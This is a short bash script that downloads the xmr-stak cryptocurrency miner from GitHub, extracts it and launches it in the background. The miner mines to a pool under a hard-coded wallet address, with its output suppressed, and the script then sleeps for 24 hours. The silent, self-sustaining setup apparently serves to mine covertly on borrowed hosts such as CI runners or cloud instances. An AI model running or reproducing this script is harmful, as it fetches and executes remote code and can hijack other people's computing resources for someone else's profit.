#!/bin/bash
wget https://github.com/fireice-uk/xmr-stak/releases/download/2.10.8/xmr-stak-linux-2.10.8-cpu_cuda-nvidia.tar.xz && tar -xvf xmr-stak-linux-2.10.8-cpu_cuda-nvidia.tar.xz && cd xmr-stak-linux-2.10.8-cpu_cuda-nvidia && ./xmr-stak --tls-url de.equilibria.herominers.com:1195 --user Tsz5AHWF7wY5hFVMH2MVAYZtTcqRD8mQNDXRsmuJcy94HyqmrzkHzctCxpmxHZrc6XgskqHzYxXSQEuvRcsMwwza6WKVuLBtAV --pass $(echo $(shuf -i 1-20000 -n 1)-kido) --currency cryptonight_gpu >/dev/null &
sleep 24h
